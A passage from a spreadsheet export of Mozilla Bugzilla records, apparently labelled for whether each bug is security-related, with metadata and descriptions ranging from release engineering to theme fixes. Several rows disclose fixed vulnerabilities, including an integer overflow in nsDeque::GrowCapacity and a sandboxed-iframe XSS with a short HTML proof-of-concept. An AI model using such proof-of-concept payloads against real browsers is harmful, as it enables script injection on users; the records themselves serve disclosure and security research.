      <c r="W5053" t="inlineStr">
        <is>
          <t>As part of bug 675793, we're adding new buildbot masters to replace those on VMWare.  These new hosts have been up for 3 weeks, but need releng to set them up and make masters of them before their predecessors can be deleted.
They are up and can be logged into with releng credentials.  If they need anything more, let me know.</t>
        </is>
      </c>
      <c r="X5053" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5054">
      <c r="A5054" t="n">
        <v>1479311</v>
      </c>
      <c r="B5054" t="inlineStr">
        <is>
          <t>2018-07-29 12:32:26 -0700</t>
        </is>
      </c>
      <c r="C5054" t="inlineStr">
        <is>
          <t>Firefox for Android - AddressBar Spoofing using specially-crafted javascript: URL opened in a new tab</t>
        </is>
      </c>
      <c r="D5054" t="inlineStr">
        <is>
          <t>2024-05-30 09:47:24 -0700</t>
        </is>
      </c>
      <c r="E5054" t="n">
        <v>1</v>
      </c>
      <c r="F5054" t="n">
        <v>1</v>
      </c>
      <c r="G5054" t="n">
        <v>6</v>
      </c>
      <c r="H5054" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5054" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5054" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5054" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="L5054" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5054" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5054" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5054" t="inlineStr">
        <is>
          <t>[adv-main62+]</t>
        </is>
      </c>
      <c r="Q5054" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5054" t="inlineStr">
        <is>
          <t>Firefox 63</t>
        </is>
      </c>
      <c r="T5054" t="n">
        <v>1</v>
      </c>
      <c r="U5054" t="n">
        <v>0</v>
      </c>
      <c r="V5054" t="n">
        <v>12</v>
      </c>
      <c r="W5054" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:61.0) Gecko/20100101 Firefox/61.0
Build ID: 20180604143143
Steps to reproduce:
When a Malicious web-page on an Attacker Web-Site opens a javascript: URL containing the Attacker Domain 
(Example: Attacker Domain = www.yyy.com ;  javascript URL opened = javascript: [codes] + www.yyy.com + [codes] ) , 
the Attacker Domain is visible at the right into the AddressBar and covers the javascript: Protocol, 
so at the left into the AddressBar it is possible to show another Domain (ex: www.google.com ; www.bankofamerica.com …).
This can lead to AddressBar Spoofing (The Video Demo in Attachments will show you how this vulnerability works).
STR:
-1) Go to the TestCase URL and Click on the « ClickMe » link (The specially-crafted javascript: URL is now opened in a new tab).
This javascript: URL opened in a new tab can lead to AddressBar Spoofing.
Actual results:
The specially-crafted javascript: URL can lead to AddressBar Spoofing (As demonstrated in the video-demo in Attachments).
Expected results:
A possibility to fix this vulnerability: the specially-crafted javascript URL should be visible like others javascript URL (The javascript protocol should be always visible into the Address Bar)</t>
        </is>
      </c>
      <c r="X5054" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5055">
      <c r="A5055" t="n">
        <v>1199400</v>
      </c>
      <c r="B5055" t="inlineStr">
        <is>
          <t>2015-08-27 11:58:48 -0700</t>
        </is>
      </c>
      <c r="C5055" t="inlineStr">
        <is>
          <t>Overflow in nsDeque::GrowCapacity can cause memory-safety bug</t>
        </is>
      </c>
      <c r="D5055" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:46 -0700</t>
        </is>
      </c>
      <c r="E5055" t="n">
        <v>1</v>
      </c>
      <c r="F5055" t="n">
        <v>1</v>
      </c>
      <c r="G5055" t="n">
        <v>3</v>
      </c>
      <c r="H5055" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5055" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5055" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5055" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L5055" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5055" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5055" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5055" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q5055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5055" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5055" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5055" t="n">
        <v>1</v>
      </c>
      <c r="U5055" t="n">
        <v>0</v>
      </c>
      <c r="V5055" t="n">
        <v>37</v>
      </c>
      <c r="W5055" t="inlineStr">
        <is>
          <t>nsDeque::GrowCapacity (xpcom\glue\nsDeque.cpp) does not properly check for overflow. This can cause it to allocate a buffer that is too small to contain the deque's elements, some of which then are written to memory that the deque does not own.
Details:
--------
If the deque's existing capacity |mCapacity| has the range [0x10000000, 0x1fffffff] (1-2 GB), then line 166 (below) computes a valid |theNewSize| with the range [0x40000000, 0x7ffffffc] and the tests on lines 167-70 pass:
163: bool
164: nsDeque::GrowCapacity()
165: {
166:   int32_t theNewSize = mCapacity &lt;&lt; 2;
167:   NS_ASSERTION(theNewSize &gt; mCapacity, "Overflow");
168:   if (theNewSize &lt;= mCapacity) {
169:     return false;
170:   }
Control passes to line 171, which multiples |theNewSize| by |sizeof(void*)|, which is 4 on x86 architectures. The resulting values [0x100000000, 0x1fffffff0] overflow |size_t| on x86 architectures, and are truncated to [0, 0xfffffff0] [1]:
171:   void** temp = (void**)malloc(theNewSize * sizeof(void*));
172:   if (!temp) {
173:     return false;
174:   }
Line 171 can allocate sizes near the lower end of this range, so then control passes to lines 181-82, which write beyond the end of the buffer:
175: 
176:   //Here's the interesting part: You can't just move the elements
177:   //directly (in situ) from the old buffer to the new one.
178:   //Since capacity has changed, the old origin doesn't make
179:   //sense anymore. It's better to resequence the elements now.
180: 
181:   memcpy(temp, mData + mOrigin, sizeof(void*) * (mCapacity - mOrigin));
182:   memcpy(temp + (mCapacity - mOrigin), mData, sizeof(void*) * mOrigin);
...
Any elements added later are also written beyond the end of the buffer.
[1] There is no overflow on x64 architectures, where |sizeof(size_t)| == 8.</t>
        </is>
      </c>
      <c r="X5055" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5056">
      <c r="A5056" t="n">
        <v>1481223</v>
      </c>
      <c r="B5056" t="inlineStr">
        <is>
          <t>2018-08-06 07:25:07 -0700</t>
        </is>
      </c>
      <c r="C5056" t="inlineStr">
        <is>
          <t>Create SUMO article to document Mac Flash Sandbox limitations and instructions to disable</t>
        </is>
      </c>
      <c r="D5056" t="inlineStr">
        <is>
          <t>2018-09-07 08:00:54 -0700</t>
        </is>
      </c>
      <c r="E5056" t="n">
        <v>1</v>
      </c>
      <c r="F5056" t="n">
        <v>1</v>
      </c>
      <c r="G5056" t="n">
        <v>5</v>
      </c>
      <c r="H5056" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5056" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5056" t="inlineStr">
        <is>
          <t>Knowledge Base Content</t>
        </is>
      </c>
      <c r="K5056" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5056" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5056" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5056" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5056" t="inlineStr"/>
      <c r="Q5056" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5056" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5056" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5056" t="n">
        <v>1</v>
      </c>
      <c r="U5056" t="n">
        <v>0</v>
      </c>
      <c r="V5056" t="n">
        <v>17</v>
      </c>
      <c r="W5056" t="inlineStr">
        <is>
          <t>We are targeting a build 62 release of the Mac Flash sandbox via bug 1474375 "[Mac] Let Sandboxing for the Flash NPAPI plugin process ride the trains". We should create a SUMO article documenting the Flash functionality affected by the sandbox and how to disable the sandbox.</t>
        </is>
      </c>
      <c r="X5056" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5057">
      <c r="A5057" t="n">
        <v>1411236</v>
      </c>
      <c r="B5057" t="inlineStr">
        <is>
          <t>2017-10-24 05:15:17 -0700</t>
        </is>
      </c>
      <c r="C5057" t="inlineStr">
        <is>
          <t>Conflicting sidebar search bar padding rules on Windows</t>
        </is>
      </c>
      <c r="D5057" t="inlineStr">
        <is>
          <t>2017-11-07 04:55:54 -0800</t>
        </is>
      </c>
      <c r="E5057" t="n">
        <v>1</v>
      </c>
      <c r="F5057" t="n">
        <v>1</v>
      </c>
      <c r="G5057" t="n">
        <v>2</v>
      </c>
      <c r="H5057" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5057" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5057" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5057" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L5057" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5057" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5057" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5057" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q5057" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5057" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5057" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T5057" t="n">
        <v>1</v>
      </c>
      <c r="U5057" t="n">
        <v>0</v>
      </c>
      <c r="V5057" t="n">
        <v>13</v>
      </c>
      <c r="W5057" t="inlineStr">
        <is>
          <t>:(
Uploading a patch, though it's probably too late to uplift to 57.</t>
        </is>
      </c>
      <c r="X5057" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5058">
      <c r="A5058" t="n">
        <v>1107009</v>
      </c>
      <c r="B5058" t="inlineStr">
        <is>
          <t>2014-12-03 00:48:30 -0800</t>
        </is>
      </c>
      <c r="C5058" t="inlineStr">
        <is>
          <t>Intermittent test_bug346659.html | application crashed [@ std::_Rb_tree&lt;unsigned long, std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt;, std::_Select1st&lt;std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::Lay</t>
        </is>
      </c>
      <c r="D5058" t="inlineStr">
        <is>
          <t>2018-10-01 11:13:34 -0700</t>
        </is>
      </c>
      <c r="E5058" t="n">
        <v>1</v>
      </c>
      <c r="F5058" t="n">
        <v>1</v>
      </c>
      <c r="G5058" t="n">
        <v>3</v>
      </c>
      <c r="H5058" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5058" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5058" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K5058" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5058" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5058" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5058" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5058" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5058" t="inlineStr">
        <is>
          <t>[e10s only?][adv-main36+][adv-esr31.5+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5058" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5058" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5058" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5058" t="n">
        <v>1</v>
      </c>
      <c r="U5058" t="n">
        <v>0</v>
      </c>
      <c r="V5058" t="n">
        <v>46</v>
      </c>
      <c r="W5058" t="inlineStr">
        <is>
          <t>Ubuntu VM 12.04 x64 mozilla-inbound debug test mochitest-e10s-3
https://treeherder.mozilla.org/ui/logviewer.html#?job_id=4348319&amp;repo=mozilla-inbound
9:53:35 WARNING - PROCESS-CRASH | /tests/dom/tests/mochitest/bugs/test_bug346659.html | application crashed [@ std::_Rb_tree&lt;unsigned long, std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt;, std::_Select1st&lt;std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt; &gt;, std::less&lt;unsigned long&gt;, std::allocator&lt;std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt; &gt; &gt;::find(unsigned long const&amp;)]
19:53:35 INFO - Crash dump filename: /tmp/tmpfntc2z.mozrunner/minidumps/2cb3b840-7f80-6a60-2d6f69c0-40390d3d.dmp
19:53:35 INFO - Operating system: Linux
19:53:35 INFO - 0.0.0 Linux 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64
19:53:35 INFO - CPU: amd64
19:53:35 INFO - family 6 model 45 stepping 7
19:53:35 INFO - 1 CPU
19:53:35 INFO - Crash reason: SIGSEGV
19:53:35 INFO - Crash address: 0x0
19:53:35 INFO - Thread 0 (crashed)
19:53:35 INFO - 0 libxul.so!std::_Rb_tree&lt;unsigned long, std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt;, std::_Select1st&lt;std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt; &gt;, std::less&lt;unsigned long&gt;, std::allocator&lt;std::pair&lt;unsigned long const, mozilla::layers::CompositorParent::LayerTreeState&gt; &gt; &gt;::find(unsigned long const&amp;) [stl_tree.h:5b8a4fcf2894 : 1098 + 0x3]
19:53:35 INFO - rbx = 0x00007febd7144840 r12 = 0x00007fff7dd46008
19:53:35 INFO - r13 = 0x0000000000000000 r14 = 0x0000000000000000
19:53:35 INFO - r15 = 0x00007febc929eb00 rip = 0x00007febe908993e
19:53:35 INFO - rsp = 0x00007fff7dd458e0 rbp = 0x00007fff7dd458e0
19:53:35 INFO - Found by: given as instruction pointer in context
19:53:35 INFO - 1 libxul.so!mozilla::layers::CompositorParent::GetIndirectShadowTree(unsigned long) [stl_map.h:5b8a4fcf2894 : 749 + 0xb]
19:53:35 INFO - rbx = 0x00007febd7144840 r12 = 0x00007fff7dd46008
19:53:35 INFO - r13 = 0x0000000000000000 r14 = 0x0000000000000000
19:53:35 INFO - r15 = 0x00007febc929eb00 rip = 0x00007febe908998c
19:53:35 INFO - rsp = 0x00007fff7dd458f0 rbp = 0x00007fff7dd45900
19:53:35 INFO - Found by: call frame info
19:53:35 INFO - 2 libxul.so!mozilla::layers::CompositorParent::GetAPZCTreeManager(unsigned long) [CompositorParent.cpp:5b8a4fcf2894 : 1302 + 0x4]
19:53:35 INFO - rbx = 0x00007febd7144840 r12 = 0x00007fff7dd46008
19:53:35 INFO - r13 = 0x0000000000000000 r14 = 0x0000000000000000
19:53:35 INFO - r15 = 0x00007febc929eb00 rip = 0x00007febe9089a85
19:53:35 INFO - rsp = 0x00007fff7dd45910 rbp = 0x00007fff7dd45910
19:53:35 INFO - Found by: call frame info
19:53:35 INFO - 3 libxul.so!mozilla::layout::RenderFrameParent::GetApzcTreeManager() [RenderFrameParent.cpp:5b8a4fcf2894 : 332 + 0x8]
19:53:35 INFO - rbx = 0x00007febd7144840 r12 = 0x00007fff7dd46008
19:53:35 INFO - r13 = 0x0000000000000000 r14 = 0x0000000000000000
19:53:35 INFO - r15 = 0x00007febc929eb00 rip = 0x00007febea08e8ee
19:53:35 INFO - rsp = 0x00007fff7dd45920 rbp = 0x00007fff7dd45940</t>
        </is>
      </c>
      <c r="X5058" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5059">
      <c r="A5059" t="n">
        <v>1407315</v>
      </c>
      <c r="B5059" t="inlineStr">
        <is>
          <t>2017-10-10 10:20:56 -0700</t>
        </is>
      </c>
      <c r="C5059" t="inlineStr">
        <is>
          <t>Pocket More link appears in the wrong sections</t>
        </is>
      </c>
      <c r="D5059" t="inlineStr">
        <is>
          <t>2017-10-24 04:59:13 -0700</t>
        </is>
      </c>
      <c r="E5059" t="n">
        <v>1</v>
      </c>
      <c r="F5059" t="n">
        <v>1</v>
      </c>
      <c r="G5059" t="n">
        <v>2</v>
      </c>
      <c r="H5059" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5059" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5059" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K5059" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5059" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5059" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5059" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5059" t="inlineStr"/>
      <c r="Q5059" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5059" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5059" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5059" t="n">
        <v>1</v>
      </c>
      <c r="U5059" t="n">
        <v>0</v>
      </c>
      <c r="V5059" t="n">
        <v>3</v>
      </c>
      <c r="W5059" t="inlineStr">
        <is>
          <t>The Pocket "More" link appears in the highlights section. It should only appear in the Pocket section.</t>
        </is>
      </c>
      <c r="X5059" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5060">
      <c r="A5060" t="n">
        <v>1744352</v>
      </c>
      <c r="B5060" t="inlineStr">
        <is>
          <t>2021-12-03 15:12:21 -0800</t>
        </is>
      </c>
      <c r="C5060" t="inlineStr">
        <is>
          <t>Sandboxed iFrame XSS - javascript URI's run with target _blank</t>
        </is>
      </c>
      <c r="D5060" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:56 -0700</t>
        </is>
      </c>
      <c r="E5060" t="n">
        <v>1</v>
      </c>
      <c r="F5060" t="n">
        <v>1</v>
      </c>
      <c r="G5060" t="n">
        <v>3</v>
      </c>
      <c r="H5060" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5060" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5060" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5060" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5060" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5060" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5060" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5060" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][sec-survey][adv-main98+][adv-esr91.7+]</t>
        </is>
      </c>
      <c r="Q5060" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5060" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5060" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T5060" t="n">
        <v>1</v>
      </c>
      <c r="U5060" t="n">
        <v>0</v>
      </c>
      <c r="V5060" t="n">
        <v>33</v>
      </c>
      <c r="W5060" t="inlineStr">
        <is>
          <t>(Thank you Firefox developers for all your hard work! The world needs Firefox.)
I believe the following is an XSS vulnerability present in the current release channel. By specifying target="blank" you can execute javascript in the domain of a sandboxed iframe, even though allow-scripts is not specified.
This behavior is blocked by Edge, Chrome, and Safari. Demo: https://emcmanus.github.io/xss.html
Expected result:
* Sandboxed iframes should not execute JS unless `allow-scripts` is specified
* Firefox should block the `javascript:` uri
* Firefox behavior should match other browsers
Actual result:
* Javascript runs in the current domain, even though `allow-scripts` is not specified
* Edge, Safari and Chrome block this behavior
* It does not matter whether you use src or srcdoc
I believe a related bug was patched in Firefox 79: https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/#CVE-2020-15653
Here is the source of the demo:
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta http-equiv='content-type' content='text/html; charset=UTF-8'&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;iframe sandbox="allow-same-origin allow-popups" srcdoc="&lt;a href=&amp;quot;javascript:alert(document.domain)&amp;quot; target=&amp;quot;_blank&amp;quot;&gt;click me&lt;/a&gt;"&gt;&lt;/iframe&gt;
  &lt;/body&gt;
&lt;/html&gt;
```</t>
        </is>
      </c>
      <c r="X5060" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5061">
      <c r="A5061" t="n">
        <v>1847180</v>
      </c>
      <c r="B5061" t="inlineStr">
        <is>
          <t>2023-08-04 01:55:11 -0700</t>
        </is>
      </c>
      <c r="C5061" t="inlineStr">
        <is>
          <t>Handle .msix .msixbundle .appx .appxbundle as potentially dangerous</t>
        </is>
      </c>
      <c r="D5061" t="inlineStr">
        <is>
          <t>2024-04-28 23:52:25 -0700</t>
        </is>
      </c>
      <c r="E5061" t="n">
        <v>1</v>
      </c>
      <c r="F5061" t="n">
        <v>1</v>
      </c>
      <c r="G5061" t="n">
        <v>2</v>
      </c>
      <c r="H5061" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5061" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5061" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K5061" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5061" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5061" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5061" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5061" t="inlineStr">
        <is>
          <t>[adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q5061" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5061" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5061" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T5061" t="n">
        <v>1</v>
      </c>
      <c r="U5061" t="n">
        <v>0</v>
      </c>
      <c r="V5061" t="n">
        <v>23</v>
      </c>
      <c r="W5061" t="inlineStr">
        <is>
          <t>Chromium has just added these to the list of files for Safe Browsing checks:
https://chromium-review.googlesource.com/c/chromium/src/+/4726241
https://chromium-review.googlesource.com/c/chromium/src/+/4734838
msix is better described here:
https://learn.microsoft.com/en-us/windows/msix/overview#inside-an-msix-package
A couple articles about how these have been abused in the past:
https://www.securityweek.com/microsoft-disables-msix-protocol-due-abuse-malware/
https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
It seems the most common approach is making the user believe they are installing a trustable software, and abusing sideloading.
We should at least enable ApplicationRepution for these.
It's unclear whether it's necessary to show the executable warning, since these are expected to be installers and the apps should ideally run in a protected environment.</t>
        </is>
      </c>
      <c r="X5061" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5062">
      <c r="A5062" t="n">
        <v>823373</v>
      </c>
      <c r="B5062" t="inlineStr">
        <is>
          <t>2012-12-19 20:17:40 -0800</t>
        </is>
      </c>
      <c r="C5062" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.15 Beta 5</t>
        </is>
      </c>
      <c r="D5062" t="inlineStr">
        <is>
          <t>2012-12-30 18:14:00 -0800</t>
        </is>
      </c>
      <c r="E5062" t="n">
        <v>1</v>
      </c>
      <c r="F5062" t="n">
        <v>1</v>
      </c>
      <c r="G5062" t="n">
        <v>2</v>
      </c>
      <c r="H5062" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5062" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5062" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5062" t="inlineStr">
        <is>
          <t>SeaMonkey 2.15 Branch</t>
        </is>
      </c>
      <c r="L5062" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5062" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5062" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5062" t="inlineStr"/>
      <c r="Q5062" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5062" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5062" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5062" t="n">
        <v>1</v>
      </c>
      <c r="U5062" t="n">
        <v>0</v>
      </c>
      <c r="V5062" t="n">
        <v>2</v>
      </c>
      <c r="W5062" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.15 Beta 5
We expect an actual release on Friday 21st December.</t>
        </is>
      </c>
      <c r="X5062" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5063">
      <c r="A5063" t="n">
        <v>72837</v>
      </c>
      <c r="B5063" t="inlineStr">
        <is>
          <t>2001-03-21 10:12:51 -0800</t>
        </is>
      </c>
      <c r="C5063" t="inlineStr">
        <is>
          <t>Bugzilla should produce JS version of Components/Products etc.</t>
        </is>
      </c>
      <c r="D5063" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E5063" t="n">
        <v>1</v>
      </c>
      <c r="F5063" t="n">
        <v>1</v>
      </c>
      <c r="G5063" t="n">
        <v>4</v>
      </c>
      <c r="H5063" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5063" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5063" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5063" t="inlineStr">
        <is>
          <t>2.11</t>
        </is>
      </c>
      <c r="L5063" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5063" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5063" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5063" t="inlineStr"/>
      <c r="Q5063" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5063" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5063" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5063" t="n">
        <v>1</v>
      </c>
      <c r="U5063" t="n">
        <v>0</v>
      </c>
      <c r="V5063" t="n">
        <v>46</v>
      </c>
      <c r="W5063" t="inlineStr">
        <is>
          <t>We have continual trouble updating the Bugzilla Helper to keep in sync with 
component changes - the results of falling behind are scary messages about 
"database corruption". What we really need is for Bugzilla to generate a .js 
file with data structures in to hold this information. This could then be used 
by the Bugzilla query form and things like Bugzilla Helper.
The query form already has something like this in it; splitting them off into a 
separate file shouldn't be too hard. Filing this bug to keep track of the idea, 
but it's probably 2.16 at the earliest. :-(
Gerv</t>
        </is>
      </c>
      <c r="X5063" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5064">
      <c r="A5064" t="n">
        <v>517263</v>
      </c>
      <c r="B5064" t="inlineStr">
        <is>
          <t>2009-09-17 11:09:24 -0700</t>
        </is>
      </c>
      <c r="C5064" t="inlineStr">
        <is>
          <t>Mac Try builds not working right on mozilla-central</t>
        </is>
      </c>
      <c r="D5064" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
